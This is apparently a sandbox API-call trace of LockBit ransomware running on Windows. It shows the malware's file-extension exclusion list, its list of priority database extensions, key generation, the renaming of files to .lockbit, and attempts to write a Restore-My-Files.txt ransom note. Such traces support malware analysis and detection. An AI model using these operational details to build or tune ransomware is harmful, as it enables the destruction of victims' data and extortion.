0x1ff1e60 [0121.114] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11694) returned 1 [0121.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.115] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.116] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.118] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.118] malloc (_Size=0xa6) returned 0x77d7a8 [0121.119] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.120] free (_Block=0x77d7a8) [0121.120] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.120] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.120] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.120] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x3632, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099153.WMF", cAlternateFileName="")) returned 1 [0121.120] lstrcmpiW (lpString1=".", lpString2="J0099153.WMF") returned -1 [0121.120] lstrcmpiW (lpString1="..", lpString2="J0099153.WMF") returned -1 [0121.120] PathFindExtensionW (pszPath="J0099153.WMF") returned=".WMF" [0121.120] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.120] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.120] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.120] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.121] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.122] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.122] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099153.WMF") returned 1 [0121.123] lstrcmpiW (lpString1="ntldr", lpString2="J0099153.WMF") returned 1 [0121.123] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099153.WMF") returned 1 [0121.123] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099153.WMF") returned -1 [0121.123] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099153.WMF") returned -1 [0121.123] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099153.WMF") returned 1 [0121.123] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099153.WMF") returned -1 [0121.123] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.123] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned=".WMF" [0121.123] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.123] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.123] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.124] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.124] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.lockbit") returned 72 [0121.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0121.129] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.129] malloc (_Size=0x40068) returned 0x3e70008 [0121.129] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=13874) returned 1 [0121.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0121.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0121.131] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0121.134] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.134] malloc (_Size=0xa6) returned 0x77d7a8 [0121.134] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.135] free (_Block=0x77d7a8) [0121.135] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.135] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.136] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1b11, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099154.JPG", cAlternateFileName="")) returned 1 [0121.136] lstrcmpiW (lpString1=".", lpString2="J0099154.JPG") returned -1 [0121.136] lstrcmpiW (lpString1="..", lpString2="J0099154.JPG") returned -1 [0121.136] PathFindExtensionW (pszPath="J0099154.JPG") returned=".JPG" [0121.136] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.136] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.136] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.136] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.136] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.136] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.137] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.137] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.138] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.138] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099154.JPG") returned 1 [0121.138] lstrcmpiW (lpString1="ntldr", lpString2="J0099154.JPG") returned 1 [0121.138] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099154.JPG") returned 1 [0121.139] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099154.JPG") returned -1 [0121.139] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099154.JPG") returned -1 [0121.139] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099154.JPG") returned 1 [0121.139] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099154.JPG") returned -1 [0121.139] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.139] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned=".JPG" [0121.139] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.139] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.139] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.139] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.140] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.140] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.141] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.141] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.141] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.141] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.lockbit") returned 72 [0121.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0121.148] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.148] malloc (_Size=0x40068) returned 0x3d70450 [0121.148] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6929) returned 1 [0121.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0121.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0121.149] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0121.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.152] malloc (_Size=0xa6) returned 0x77d7a8 [0121.152] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.153] free (_Block=0x77d7a8) [0121.153] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.153] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.153] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.153] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x227a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099155.JPG", cAlternateFileName="")) returned 1 [0121.153] lstrcmpiW (lpString1=".", lpString2="J0099155.JPG") returned -1 [0121.153] lstrcmpiW (lpString1="..", lpString2="J0099155.JPG") returned -1 [0121.153] PathFindExtensionW (pszPath="J0099155.JPG") returned=".JPG" [0121.153] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.153] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.153] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.153] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.153] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.153] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.154] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.154] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.155] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.155] 